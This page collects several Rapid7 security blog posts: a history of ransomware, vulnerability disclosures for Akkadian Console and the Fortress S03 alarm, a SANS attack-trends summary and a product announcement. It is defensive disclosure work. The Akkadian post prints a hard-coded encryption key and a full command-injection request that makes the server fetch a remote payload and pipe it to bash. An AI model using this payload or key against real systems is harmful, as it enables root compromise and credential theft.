Tag Archives: cybersecurity

The Rise of Disruptive Ransomware Attacks: A Call To Action

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/09/10/the-rise-of-disruptive-ransomware-attacks-a-call-to-action/

Our collective use of and dependence on technology has come quite a long way since 1989. That year, the first documented ransomware attack — the AIDS Trojan — was spread via physical media (5 1⁄4″ floppy disks) delivered by the postal service to individuals subscribed to a mailing list. The malware encrypted filenames (not the contents) and demanded that payment ($189 USD) be sent to a post office box in exchange for codes that would unscramble the directory entries.

That initial ransomware attack — started by an emotionally disturbed AIDS researcher — gave rise to a business model that has evolved since then to become one of the most lucrative and increasingly disruptive cybercriminal enterprises in modern history.

In this post, we’ll:

  • Examine what has enabled this growth
  • See how tactics and targets have morphed over the years
  • Take a hard look at the societal impacts of more recent campaigns
  • Paint an unfortunately bleak picture of where these attacks may be headed if we cannot work together to curtail them

Building the infrastructure of our own demise: Ransomware’s growth enablers

As PCs entered homes and businesses, individuals and organizations increasingly relied on technology for everything from storing albums of family pictures to handling legitimate business processes of all shapes and sizes. They were also becoming progressively more connected to the internet — a domain formerly dominated by academics and researchers. Electronic mail (now email) morphed from a quirky, niche tool to a ubiquitous medium, connecting folks across the globe. The World Wide Web shifted from being a medium solely used for information exchange to the digital home of corporations and a cadre of storefronts.

The capacity and capabilities of cyberspace grew at a frenetic pace and fueled great innovation. The cloud was born, cheaply putting vast compute resources into the hands of anyone with a credit card and reducing the complexity of building internet-enabled services. Today, sitting on the beach in an island resort, we can speak to the digital assistant on our smartphones and issue commands to our home automation systems thousands of miles away.

Despite appearances, this evolution and expansion was — for the most part — unplanned and emerged with little thought towards safety and resilience, creating (unseen by most) fragile interconnections and interdependencies.

The concept and exchange mechanisms of currency also changed during this time. Checks in the mail and wire transfers over copper lines have been replaced with digital credit and debit transactions and fiat-less digital currency ledger updates.

So, we now have blazing fast network access from even the most remote locations, globally distributed, cheap, massive compute resources, and baked-in dependence on connected technology in virtually every area of modern life, coupled with instantaneous (and increasingly anonymous) capital exchange. Most of this infrastructure — and nearly all the processes and exchanges that run on it — are unprotected or woefully underprotected, making it the perfect target for bold, brazen, and clever criminal enterprises.

From pictures to pipelines: Ransomware’s evolving targets and tactics

At their core, financially motivated cybercriminals are entrepreneurs who understand that their business models must be diverse and need to evolve with the changing digital landscape. Ransomware is only one of many business models, and it’s taken a somewhat twisty path to where we are today.

Attacks in the very early 2000s were highly regional (mostly Eastern Europe) and used existing virus/trojan distribution mechanisms that randomly targeted businesses via attachments spread by broad stroke spam campaigns. Unlike their traditional virus counterparts, these ransomware pioneers sought small, direct payouts in e-gold, one of the first widely accessible digital currency exchanges.

By the mid-2000s, e-gold was embroiled in legal disputes and was, for the most part, defunct. Far from deterring attackers, this led even more groups to try their hands at the ransomware scheme, since it had a solid track record of ensuring at least some percentage of payouts.

Many groups shifted attacks towards individuals, encrypting anything from pictures of grandkids to term papers. Instead of currency, these criminals forced victims to procure medications from online pharmacies and hand over account credentials so the attackers could route delivery to their drop boxes.

Others took advantage of the fear of exposure and locked up the computer itself (rather than encrypt files or drives), displaying explicit images that could be dismissed after texting or calling a “premium-rate” number for a code.

However, there were those who still sought the refuge of other fledgling digital currency markets, such as Liberty Reserve, and migrated the payout portion of encryption-based campaigns to those exchanges.

By the early 2010s — due, in part, to the mainstreaming of Bitcoin and other digital currencies/exchanges, combined with the absolute reliance of virtually all business processes on technology — these initial, experimental business models coalesced into a form we should all recognize today:

  • Gain initial access to a potential victim business. This can happen via phishing, but it is increasingly done by compromising internet-facing gateways or by using legitimate credentials to log onto VPNs (as in the attack on Colonial Pipeline) and other remote access portals. Attacks shifted focus to businesses because they offer both higher payouts and a higher likelihood of actually paying.
  • Encrypt critical files on multiple critical systems. Attackers developed highly capable, customized utilities for performing encryption quickly across a wide array of file types, along with a library of successful, battle-tested techniques for moving laterally throughout an organization. Criminals also know that the backup and recovery processes at most organizations are lacking.
  • Demand a digital currency payout within a given timeframe. The temporal component places added pressure on the organization to pay or potentially lose its files forever.

The technology and business processes supporting this new model became sophisticated and commonplace enough that an entirely new ransomware-as-a-service criminal industry emerged, enabling almost anyone with a computer to become an aspiring ransomware mogul.

On the cusp of 2020, a visible trend emerged: victim organizations increasingly declined to pay ransom demands. Not wanting to lose a very profitable revenue source, attackers added some new techniques into the mix:

  • Identify and exfiltrate high-value files and data before encrypting them. Frankly, it's odd that more attackers did not do this before the payment downturn (though some likely did). By spending a bit more time identifying this prized data, attackers could then use it as part of their overall scheme.
  • Threaten to leak the data publicly or to the individuals/organizations identified in the data. It should come as no surprise that most ransomware attacks go unreported to the authorities and unseen by the media. No organization wants the reputation hit associated with an attack of this type, and adding exposure to the mix helped return payouts to near previous levels.

The high-stakes gambit of disruptive attacks: Risky business with significant collateral damage

Not all ransomware attacks go unseen, but even those that gain some attention rarely make mainstream national news. In the U.S. alone, hundreds of schools and municipalities have experienced disruptive and costly ransomware attacks each year going back as far as 2016.

Municipal ransomware attacks

When a town or city is taken down by a ransomware attack, critical safety services such as police and first responders can be taken offline for days. Businesses and citizens cannot make payments on time-critical bills. Workers, many of whom exist paycheck-to-paycheck, cannot be paid. Even when a city like Atlanta refuses to reward criminals with a payment, it can still cost taxpayers millions of dollars and many, many months to have systems recovered to their previous working state.

School-district ransomware attacks

Similarly, when a school district is impacted, schools — which increasingly rely on technology and internet access in the classroom — may not be able to function, forcing parents to scramble for child care or lose time from work. As schools were forced online during the pandemic, disruptive ransomware attacks also made remote, online classes inaccessible, exacerbating an already stressful learning environment.

Hobbled learning is not the only potential outcome. Recently, one of the larger districts in the U.S. fell victim to a $547,000 USD ransom attack, which was ultimately paid to stop sensitive student and personnel data from becoming public. The downstream identity theft and other impacts of such a leak are almost impossible to calculate.

Healthcare ransomware attacks

Hundreds of healthcare organizations across the U.S. have also suffered annual ransomware attacks over the same period. When the systems, networks, and data in a hospital are frozen, personnel must revert to backup "pen-and-paper" processes, which are far less efficient than their digital counterparts. Healthcare emergency communications are also increasingly digital, and a technology blackout can force critical care facilities into "divert" mode, meaning that incoming ambulances with crisis care patients must go miles out of their way to other facilities, increasing the chances of severe negative outcomes for those patients — especially when coupled with pandemic-related outbreak surges.

The U.K. National Health Service was severely impacted by the WannaCry ransom-"worm" gone awry back in 2017. In total, "1% of NHS activity was directly affected by the WannaCry attack. 80 out of 236 hospital trusts across England [had] services impacted even if the organisation was not infected by the virus (for instance, they took their email offline to reduce the risk of infection); [and,] 595 out of 7,454 GP practices (8%) and eight other NHS and related organisations were infected," according to the NHS's report.

An attack on Scripps Health in the U.S. in 2021 disrupted operations across the entire network for over a month and has — to date — cost the organization over $100M USD, plus impacted emergency and elective care for thousands of individuals.

An even more deliberate, massive attack against Ireland's healthcare network is expected to ultimately cost taxpayers over $600M USD, with recovery efforts still underway months after the attack, despite the attackers providing the decryption keys free of charge.

Transportation ransomware attacks

Public and commercial transportation systems in San Francisco, Massachusetts, Colorado, Montreal, the U.K., and scores of other locations across the globe have been targets of ransomware attacks. In many instances, systems are locked up sufficiently to prevent passengers from getting to destinations such as work, school, or medical care. Locking up freight transportation means critical goods cannot be delivered on time.

Critical infrastructure ransomware attacks

U.S. citizens came face-to-face with the impacts of large-scale ransomware attacks in 2021 as attackers disrupted access to fuel and impacted the food supply chain, causing shortages, panic buying, and severe price spikes in each industry.

Water systems and other utilities across the U.S. have also fallen victim to ransomware attacks in recent years, exposing deficiencies in the cyber defenses in these sectors.

Service provider ransomware attacks

Finally, one of the most high-profile ransomware attacks of all time has been the Kaseya attack. Ultimately, over 1,500 organizations — everything from regional retail and grocery chains to schools, governments, and businesses — were taken offline for over a week due to attackers compromising a software component used by hundreds of managed service providers. Revenue was lost, parents scrambled for last-minute care, and other processes were slowed or completely stopped. If the attackers had been just a tad more methodical, patient, and competent, this mass ransomware attack could have been far more wide-reaching and devastating than it already was.

The road ahead: Ransomware will get worse until we get better

The first section of this post showed how we created the infrastructure of our own ransomware demise. Technology has advanced and been adopted faster than our ability to ensure the safety and resilience of the processes that sit on top of it. When one of the largest distributors of our commercial fuel supply could still be accessed remotely with nothing more than a single set of credentials, it is clear we have not all done enough — up to now — to inform, educate, and support critical infrastructure security, let alone that of schools, hospitals, municipalities, and businesses in general.

As ransomware attacks continue to escalate and become broader in reach and scope, we will also continue to see increasing societal collateral damage.

Now is the time for action. Thankfully, we have a framework for just such action! Rapid7 was part of a multi-stakeholder task force charged with coming up with a framework to combat ransomware. As we work toward supporting each of the efforts detailed in the report, we encourage all other organizations and especially all governments to dedicate time and resources towards doing the same. We must work together to stem the tide, change the attacker economics, and reduce the impacts of ransomware on society as a whole.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2021-3546[78]: Akkadian Console Server Vulnerabilities (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/09/07/cve-2021-3546-78-akkadian-console-server-vulnerabilities-fixed/

Over the course of routine security research, Rapid7 researchers Jonathan Peterson, Cale Black, William Vu, and Adam Cammack discovered that the Akkadian Console (often referred to as "ACO") version 4.7, a call manager solution, is affected by two vulnerabilities. The first, CVE-2021-35467, allows for the decryption of data encrypted by the application, which results in the arbitrary creation of sessions and the exposure of any other sensitive data stored within the application. The second, CVE-2021-35468, allows root system command execution with a single authenticated POST request. Combined, they allow an unauthenticated attacker to gain remote root privileges on a vulnerable instance of Akkadian Console Server.

  • CVE-2021-35467: CWE-321 (Use of Hard-Coded Cryptographic Key); fixed in version 4.9
  • CVE-2021-35468: CWE-78 (Improper Neutralization of Special Elements used in an OS Command, 'OS Command Injection'); fixed in version 4.9

Product Description

Akkadian Console (ACO) is a call management system allowing users to handle incoming calls with a centralized management web portal. More information is available at the vendor site for ACO.

Credit

These issues were discovered by Jonathan Peterson (@deadjakk), Cale Black, William Vu, and Adam Cammack, all of Rapid7, and they are being disclosed in accordance with Rapid7's vulnerability disclosure policy.

Exploitation

The following were observed and tested on the Linux build of the Akkadian Console Server, version 4.7.0 (build 1f7ad4b) (date of creation: Feb 2 2021 per naming convention).

CVE-2021-35467: Akkadian Console Server Hard-Coded Encryption Key

Using DnSpy to decompile the bytecode of ‘acoserver.dll’ on the Akkadian Console virtual appliance, Rapid7 researchers identified that the Akkadian Console was using a static encryption key, “0c8584b9-020b-4db4-9247-22dd329d53d7”, for encryption and decryption of sensitive data. Specifically, researchers observed at least the following data encrypted using this hardcoded string:

  • User sessions (the most critical of the set, as outlined below)
  • FTP Passwords
  • LDAP credentials
  • SMTP credentials
  • Miscellaneous service credentials

The string constant used to encrypt and decrypt this data is hard-coded into the 'primary' C# library. So anyone who knows the string, or who can learn it by interrogating a shipping copy of 'acoserver.dll', can decrypt and recover these values.

In addition to being able to recover the saved credentials of various services, Rapid7 researchers were able to write encrypted user sessions for the Akkadian Console management portal with arbitrary data, granting access to administrative functionality of the application.

[Image: The hardcoded key as shown in the decompiled code of the ACO server]

The TokenService of acoserver.dll uses a hardcoded string to encrypt and decrypt user session information, as well as other data in the application that uses the ‘Encrypt’ method.

As shown in the function below, the application makes use of an ECB cipher, as well as PKCS7 padding to decrypt (and encrypt) this sensitive data.

[Image: Decrypt function present in acoserver.dll, viewed with DnSpy]

The image below shows an encrypted and decrypted version of an ‘Authorization’ header displaying possible variables available for manipulation. Using a short python script, one is able to create a session token with arbitrary values and then use it to connect to the Akkadian web console as an authenticated user.
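
The short script itself is not reproduced in the post; the following is a standard-library-only sketch of the mechanics, under stated assumptions. The cipher is described above only as ECB mode with PKCS7 padding, so the block cipher step (commonly AES via a third-party library such as pycryptodome) is stubbed out as a pluggable `encrypt` callable, and the session fields shown are illustrative, not the real acoserver.dll token layout.

```python
# Sketch: forging a session blob once the static key is known.
# Only the PKCS7 padding layer and the token-building flow are shown;
# the ECB block-cipher step is passed in as `encrypt` (assumed AES-ECB
# under the leaked key in the real attack). All field names are invented.
import json
import time

BLOCK = 16  # typical block size in bytes

def pkcs7_pad(data: bytes, block: int = BLOCK) -> bytes:
    """Append N bytes of value N so the length is a multiple of `block`."""
    n = block - (len(data) % block)
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    """Strip PKCS7 padding (no integrity check, much like ECB itself)."""
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS7 padding")
    return data[:-n]

def forge_token(username: str, encrypt) -> bytes:
    """Build a plaintext session blob and run it through the cipher.
    `encrypt` stands in for ECB encryption under the hard-coded key."""
    session = {"user": username, "role": "admin", "ts": int(time.time())}
    return encrypt(pkcs7_pad(json.dumps(session).encode()))
```

With the real cipher plugged in, the output would be sent as the 'Authorization' header shown above.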

[Image: Successfully decrypted session generated by the application]

Using the decrypted values of a session token, a ‘custom’ token can be created, substituting whatever values we want with a recent timestamp to successfully authenticate to the web portal.

The figure below shows this technique being used to issue a request to a restricted web endpoint that responds with the encrypted passwords of the user account. Since the same key is used to encrypt most things in the application (sessions, saved passwords for FTP, backups, LDAP, etc.), we can decrypt the encrypted passwords that certain portions of the application send back in the response:

[Image: Using the same private key to decrypt the encrypted admin password returned by the application]

This vulnerability can be used with the next vulnerability, CVE-2021-35468, to achieve remote command execution.

CVE-2021-35468: Akkadian Console Server OS Command Injection

The Akkadian Console application provides SSL certificate generation. See the corresponding web form in the screenshot below:

[Image: The web functionality associated with the vulnerable endpoint]

The application generates these certificates by using '/bin/bash' to run an unsanitized 'openssl' command constructed from the parameters of the user's request.

The screenshot below shows this portion of the code as it exists within the decompiled ‘acoserver.dll’.

[Image: Vulnerable method as seen in DnSpy]

Side Note: In newer versions (likely 4.7+), this "Authorization" header is actually validated. In older versions of the Akkadian Console, this API endpoint does not appear to enforce authorization and instead only checks for the presence of the "Authorization" header. Therefore, in these older, affected versions, this endpoint and the related vulnerability could be reached directly without crafting a header using CVE-2021-35467. Exact affected versions have not been researched.

The below curl command will cause the Akkadian Console server to itself run its own curl command (in the Organization field) and pipe the results to bash.

curl -i -s -k -X $'POST' \
   -H $'Host: 192.168.200.216' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0' -H $'Authorization: <OMITTED>' -H $'Content-Type: application/json' -H $'Content-Length: 231' \
   --data-binary $'{\"AlternativeNames\": [\"assdf.com\", \"asdf.com\"], \"CommonName\": \"mydomano.com\", \"Country\": \"US\", \"State\": \";;;;;`\", \"City\": \";;;``;;`\", \"Organization\": \";;;`curl 192.168.200.1/payload|bash`;;`\", \"OrganizationUnit\": \";;\", \"Email\": \"\"}' \
   $'https://192.168.200.216/api/acoweb/generateCertificate'

Once ACO receives this request, the embedded curl payload executes and spawns a shell; any other operating system command could be run the same way.
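
The injection pattern described above boils down to interpolating user input into a shell string. As a sketch, the following contrasts that pattern with a safe argv-based invocation; the field names and openssl arguments are illustrative, not the exact ones in acoserver.dll.

```python
# Vulnerable vs. safe command construction for a certificate-generation
# endpoint. The openssl arguments are illustrative assumptions.
import shlex

def build_subject_unsafe(org: str) -> str:
    # Vulnerable: user input is interpolated straight into a string that
    # will be handed to `bash -c`, so backticks, semicolons, and pipes in
    # `org` become live shell syntax.
    return f"openssl req -new -subj '/O={org}/CN=example.com'"

def build_argv_safe(org: str) -> list:
    # Safe: pass argv as a list (e.g. to subprocess.run without shell=True)
    # so no shell ever parses the input; the payload stays a single argument.
    return ["openssl", "req", "-new", "-subj", f"/O={org}/CN={org and 'example.com'}"]

payload = ";;;`curl 192.168.200.1/payload|bash`;;`"
unsafe = build_subject_unsafe(payload)   # backticks reach the shell intact
quoted = shlex.quote(payload)            # renders the same bytes inert
```

If a shell string truly is unavoidable, `shlex.quote` on each field is the minimum defense; the argv-list form avoids the problem entirely.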

Impact

CVE-2021-35467, by itself, can be exploited to allow an unauthenticated user administrative access to the application. Given that this device supports LDAP-related functionality, an attacker could then leverage this access to pivot to other assets in the organization through Active Directory by using the stored LDAP accounts.

CVE-2021-35468 could allow any authenticated user to execute operating system level commands with root privileges.

By combining CVE-2021-35467 and CVE-2021-35468, an unauthenticated user can first establish themselves as an authenticated user by crafting an arbitrary session, then execute commands on ACO’s host operating system as root. From there, the attacker can install any malicious software of their choice on the affected device.

Remediation

Users of Akkadian Console should update to 4.9, which has addressed these issues. In the absence of an upgrade, users of Akkadian Console version 4.7 or older should only expose the web interface to trusted networks — notably, not the internet.

Disclosure Timeline

  • April, 2021: Discovery by Jonathan Peterson and friends at Rapid7
  • Wed, Jun 16, 2021: Initial disclosure to the vendor
  • Wed, Jun 23, 2021: Updated details disclosed to the vendor
  • Tue, Jul 13, 2021: Vendor indicated that version 4.9 fixed the issues
  • Tue, Aug 3, 2021: Vendor provided a link to release notes for 4.9
  • Tue, Sep 7, 2021: Disclosure published

SANS Experts: 4 Emerging Enterprise Attack Techniques

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/09/02/sans-experts-4-emerging-enterprise-attack-techniques/

In a recent report, a panel of SANS Institute experts broke down key takeaways and emerging attack techniques from this year’s RSA Security Conference. The long and short of it? This next wave of malicious methodologies isn’t on the horizon — it’s here.

When it comes to supply-chain and ransomware attacks, bad actors seem to have migrated to new ground over the last 2 years. The SANS Institute report found that government, healthcare, and retail (thanks in large part to online spending at the height of the pandemic) were the sectors showing the largest spike in attacks between the first quarter of 2020 and this year. As larger incidents increase in frequency, let's take a look at 4 specific attack formats trending toward the norm and how you can stay ahead of them.

1. Cracks in the facade of software integrity

Developers are under greater pressure to prioritize security (i.e., shift left) within the Continuous Integration/Continuous Delivery (CI/CD) lifecycle. This would seem to be at stark odds with the number of applications built on open-source software (OSS). And, if a security organization is part of a supply chain, how many pieces of OSS are being used at one time along that chain? The potential is huge for an exponential jump in the number of vulnerabilities in that group of interdependent organizations.

There are ways to mitigate these seemingly unstoppable threats. Measures like file integrity monitoring (FIM) surface changes to critical files on your network, alerting you to suspicious activity while also providing context as to the affected users and/or assets. Threat hunting can also help to expose vulnerabilities.

Used with a cloud-native, extended-detection-and-response (XDR) approach, Rapid7’s proactive threat-hunting capabilities leverage multiple security and telemetry sources to act on fine-grained insights and empower teams to quickly take down threats.

2. Do you have a token to get into that session?

Commonly, applications make use of tokens to identify a person wishing to access secure data, like banking information. A user’s mobile app will exchange the token with a server somewhere to verify that, indeed, this is the actual user requesting the information and not an attacker. Improper session handling happens when the protocols according to which these applications are working don’t properly secure identifying tokens.

The issue of improper user authentication was exacerbated by the onset of the pandemic, as companies raced to secure — or not — enterprise software for a quickly scaled-up remote workforce. To help resolve the issue, individual users can simply make it a best practice to hit that little "log off/out" button once they're finished, and businesses can set tokens to expire automatically after a predetermined length of time.

At the enterprise level, security organizations can use a comprehensive application-testing strategy to monitor for weak session handling and nefarious attacker actions like:

  • Guessing a valid session token after only short-term monitoring
  • Using static tokens to target users, even if they’re not logged in
  • Leveraging a token to delete user data without knowing the username/password
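
The expiry-based mitigation mentioned above can be sketched as an HMAC-signed token that the server refuses once its timestamp ages out. The key, field layout, and 15-minute TTL below are illustrative assumptions, not any particular product's format.

```python
# Sketch of a signed session token with server-side expiry.
import hashlib
import hmac
import time

SECRET = b"server-side-secret"  # example only; keep per-deployment and private
TTL_SECONDS = 900               # token expires 15 minutes after issuance

def issue(user: str, now=None) -> str:
    """Mint `user:timestamp:signature`, signed with the server secret."""
    ts = str(int(now if now is not None else time.time()))
    sig = hmac.new(SECRET, f"{user}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{user}:{ts}:{sig}"

def validate(token: str, now=None) -> bool:
    """Accept only tokens with a valid signature and a fresh timestamp."""
    try:
        user, ts, sig = token.rsplit(":", 2)
    except ValueError:
        return False
    good = hmac.new(SECRET, f"{user}:{ts}".encode(), hashlib.sha256).hexdigest()
    fresh = (now if now is not None else time.time()) - int(ts) <= TTL_SECONDS
    return hmac.compare_digest(sig, good) and fresh
```

Because the signature covers the timestamp, an attacker can neither guess a valid token nor extend a stale one, which blunts all three attacker actions listed above.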

3. Turning the machines against us

No, that’s not a Terminator reference. If someone has built out a machine-learning (ML) algorithm correctly, it should do nothing but assist an organization in accomplishing its business goals. When it comes to security, this means being able to recognize traffic patterns that are relatively unknown and classifying them according to threat level.

However, attackers are increasingly able to corrupt ML algorithms and trick them into labeling malicious traffic as safe. Another sophisticated method is for attackers to purchase their own ML products and use them as training grounds to produce and deploy malware. InsightIDR from Rapid7 leverages user-behavior analytics (UBA) to stay ahead of malicious actions against ML algorithms.

Understanding how your ML product functions is key; it should build a baseline of normal user behavior across the network, then match new actions against data gleaned from a combination of machine learning and statistical algorithms. In this way, UBA exposes threats without relying on prior identification in the wild.
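
The baseline-then-compare idea reduces to a toy example: record each user's normal event rate, then flag new activity that deviates sharply from it. Production UBA uses far richer features and models than the single count and z-score threshold assumed here.

```python
# Toy user-behavior baseline: flag a new event count that sits more than
# `z_threshold` standard deviations above the user's historical counts.
from statistics import mean, stdev

def flag_anomaly(baseline_counts, new_count, z_threshold=3.0):
    """Return True if new_count is anomalously high versus the baseline."""
    mu = mean(baseline_counts)
    sigma = stdev(baseline_counts) or 1e-9  # guard against zero variance
    return (new_count - mu) / sigma > z_threshold
```

The same comparison logic generalizes to logins per hour, bytes exfiltrated, or hosts touched; the point is that the threat is detected relative to the user's own history rather than a known signature.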

4. Ramping up ransomware

Let’s face it: Attackers all over the world are essentially creating repositories and educational platforms on how to evolve and deploy ransomware. Building these packages takes sophistication, but they are now widely available to the non-technical set as, for lack of a more apt phrase, plug-and-play kits.

As attack methodologies ramp up in frequency and size, it’s not just data at risk anymore. Bad actors are threatening companies with wide public exposure and potentially a catastrophic loss to reputation. But there are opportunities to learn offensive strategies, as well as how attacker techniques can become signals for detection.

Target shifts

If the data in the SANS report tells us anything, it’s that attackers and their evolving methodologies — like those mentioned above — are constantly searching not just for bigger targets and paydays, but also easier paths to their goals.

Targeted industry shifts in year-over-year data show that the company or sector you’re in clearly makes no difference. Perhaps the biggest factor in bad actors’ strategies is the degree of ease with which they get what they want — and some industries still fall woefully behind when it comes to security and attack readiness.

Learn more about the latest threat trends

Read the full SANS report

New Rapid7 MDR Essentials Capability Sees What Attackers See: “It’s Eye-Opening”

Post Syndicated from Jake Godgart original https://blog.rapid7.com/2021/09/01/new-rapid7-mdr-capability-sees-what-attackers-see-its-eye-opening/

The pandemic and remote work shattered your perimeter. Your attack surface has changed — and will keep changing.

It’s our mission to help customers strengthen security defenses and stay ahead of evil. As the modern perimeter expands, new (and old) vulnerabilities emerge as open doors for attackers; some can be exploited, and that leads to attacks.

The fact is, most successful attacks are caused by unpatched vulnerabilities, and most can be traced back to human error. So one answer to reducing risk is to patch the vulnerabilities you find with a simple external scan.

Rapid7 has been at the forefront of vulnerability risk management for 20 years — from the days when on-premises Nexpose scanners ruled, to our cloud-based InsightVM solution, to our Managed Vulnerability Management service.

Now, we’re adding a new capability (and report) to connect proactive and reactive security for our MDR Essentials customers. We call it Attack Surface Visibility.

Introducing Attack Surface Visibility

Our goal with Attack Surface Visibility — built exclusively for our MDR Essentials customers — is to help proactively plug the holes that attackers may exploit and, in turn, reduce the number of low-hanging incidents that could be avoided.

The Attack Surface Visibility report breaks down risks in your environment based on Rapid7’s granular Real Risk score. It looks at exploitability, malware exposure, and vulnerability age to give customers the actionable data that prioritizes remediation efforts on the places attackers will focus.
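
Rapid7's actual Real Risk scoring is its own proprietary model; purely to illustrate the idea of folding exploitability, malware exposure, and vulnerability age into a single ranking, a toy scoring function might look like the following. Every weight and input here is invented.

```python
# Toy prioritization score: NOT Rapid7's Real Risk formula. Weights are
# invented solely to show how several risk signals can combine into one rank.
def toy_risk_score(cvss: float, exploit_available: bool,
                   malware_kit: bool, age_days: int) -> float:
    score = cvss * 10                        # base severity, scaled 0-100
    if exploit_available:
        score *= 1.3                         # public exploit raises urgency
    if malware_kit:
        score *= 1.2                         # known weaponization in malware
    score *= min(1.0 + age_days / 365, 2.0)  # long-unpatched bugs rank higher
    return round(min(score, 1000.0), 1)
```

Sorting findings by such a score, rather than by raw CVSS alone, is what lets a small team spend its patching time where attackers are most likely to strike first.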

Attack Surface Visibility gives MDR Essentials customers the ability to:

  • See a monthly snapshot of how your exposed attack surface looks to an opportunistic attacker
  • Gain visibility into the top externally facing vulnerabilities that attackers can easily exploit
  • Stay ahead of risks as your attack surface changes
  • Optimize your team’s efforts with clear, prioritized actions to remediate risks and improve your security posture
  • Reduce the number of alerts, MDR investigations, and incidents in your environment by being more proactive with your externally facing remediation efforts
  • Collaborate with your Security Advisor to determine prioritization and patching priority

While it does not replace the need for a true vulnerability management program, Attack Surface Visibility offers your team a better level of awareness to detect obvious weak points that attackers may exploit. Even customers running programs with InsightVM — our industry-leading vulnerability risk management solution recognized by Gartner and Forrester — are able to see value.

Attack Surface Visibility in action

The first time we spun up the scan engine and sent the new report to a customer, they saw instant value. The scan found almost 20 different remediations needed across their scanned assets, including a few highly concerning risks that their MDR Security Advisor prioritized for remediation first:

  • Remove/disable SMBv1 — For those who were in cybersecurity during 2017, I’m sure this is triggering some shell shock from the days of EternalBlue and WannaCry. Let’s be honest: SMBv1 was designed for a world that existed almost 40 years ago and doesn’t belong in 2021. Even the guy who owns SMB at Microsoft urges everyone to stop using it. The fact is, with exploit modules readily available in Metasploit, anyone who knows what they’re doing can launch an attack to exploit it. This one’s a big risk, but a quick fix.
  • Configure SMB signing for Windows — Attackers have it easy when SMB is exposed externally. Most attacks stemming from this arise from attackers leveraging credential stuffing (password reuse) on external-facing assets as their primary method of entry. Since this organization is in the process of implementing 2FA, this was another focus for immediate remediation efforts.
  • Disable insecure TLS/SSL protocol support — As time marches on, cryptography standards evolve to meet the needs of an ever-more secure internet. However, the long shadow of legacy clients tends to mean that, by default, older and insecure cryptographic protocols remain enabled. These defaults open up an attack surface that is otherwise mitigated by running modern cryptography suites. Specifically, organizations need to be aware of the risks posed by exposing older algorithms to attacks such as BEAST, POODLE, and Lucky Thirteen.
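To make the last item concrete, one way to verify that legacy protocols are actually disabled on an external-facing host is to attempt a handshake with the allowed protocol range pinned to TLS 1.0/1.1. The Python sketch below illustrates the approach (it is not a tool from the report, and whether your local OpenSSL build can even offer TLS 1.0 varies):

```python
import socket
import ssl

def accepts_legacy_tls(host: str, port: int = 443, timeout: float = 5.0) -> bool:
    """Return True if the server completes a handshake over TLS 1.0 or 1.1."""
    try:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False      # we only care about protocol support
        ctx.verify_mode = ssl.CERT_NONE
        ctx.minimum_version = ssl.TLSVersion.TLSv1    # pin the offered range
        ctx.maximum_version = ssl.TLSVersion.TLSv1_1  # to the legacy protocols
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.version() in ("TLSv1", "TLSv1.1")
    except (ssl.SSLError, ValueError, OSError):
        return False  # handshake refused, or protocols unavailable locally
```

A server that returns False here either has the legacy protocols disabled or was unreachable; only a True result indicates exposure.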

In the customer’s words, this was “eye-opening.”

You can see what a sample version of the report looks like here.

For our existing MDR Essentials customers

Good news! We will be rolling out your first Attack Surface Visibility reports starting in Q4. Your Customer Advisor will reach out to you soon to capture external IP addresses in order to begin the scanning process.

We look forward to helping you continue to build more confidence with your security program!

To our future customers

Rapid7 MDR has service offerings available for customers of any size, security maturity, or industry. Whether you’re looking for your first MDR provider or making an upgrade, we have a service that fits your goals.

Interested in learning about Rapid7 MDR? Let’s connect you with an expert.

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/31/cve-2021-3927-67-fortress-s03-wifi-home-security-system-vulnerabilities/

CVE-2021-3927[67]: Fortress S03 WiFi Home Security System Vulnerabilities

Rapid7 researcher Arvind Vishwakarma discovered multiple vulnerabilities in the Fortress S03 WiFi Home Security System. These vulnerabilities could result in unauthorized access to control or modify system behavior, and access to unencrypted information in storage or in transit. CVE-2021-39276 describes an instance of CWE-287; specifically, it describes an insecure cloud API deployment which allows unauthenticated users to trivially learn a secret that can then be used to alter the system’s functionality remotely. It has an initial CVSS score of 5.3 (medium). CVE-2021-39277 describes an instance of CWE-294, a vulnerability where anyone within Radio Frequency (RF) signal range could capture and replay RF signals to alter the system’s behavior, and has an initial CVSS score of 5.7.

Product Description

The Fortress S03 WiFi Home Security System is a do-it-yourself (DIY), consumer-grade home security system which leverages WiFi and RF communication to monitor doors, windows, and motion in order to spot possible intruders. Fortress can also electronically monitor the system for you, for a monthly fee. More information about the product can be found at the vendor’s website.

Credit

These issues were discovered by Rapid7 researcher Arvind Vishwakarma and are being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

What follows are details regarding the two disclosed vulnerabilities. Generally speaking, these issues are trivially easy to exploit by motivated attackers who already have some knowledge of the target.

CVE-2021-39276: Unauthenticated API Access

If a malicious actor knows a user’s email address, they can use it to query the cloud-based API to return an International Mobile Equipment Identity (IMEI) number, which appears to also serve as the device’s serial number. The following POST request structure is used to make this unauthenticated query and return the IMEI:

[Image: the unauthenticated POST request used to retrieve the device IMEI]

With a device IMEI number and the user’s email address, it is then possible for a malicious actor to make changes to the system, including disarming its alarm. To disarm the system, the following unauthenticated POST can be sent to the API:

[Image: the unauthenticated POST request used to disarm the system]

CVE-2021-39277: Vulnerable to RF Signal Replay Attack

The system under test was discovered to be vulnerable to an RF replay attack. When a radio-controlled device has not properly implemented encryption or rotating key protections, this can allow an attacker to capture command-and-control signals over the air and then replay those radio signals in order to perform a function on an associated device.

As a test example, the RF signals used to communicate between the Key Fobs, Door/Window Contact Sensors, and the Fortress Console were identified in the 433 MHz band. Using a software defined radio (SDR) device, the researcher was able to capture normal operations of the device “arm” and “disarm” commands. Then, replaying the captured RF signal communication command would arm and disarm the system without further user interaction.

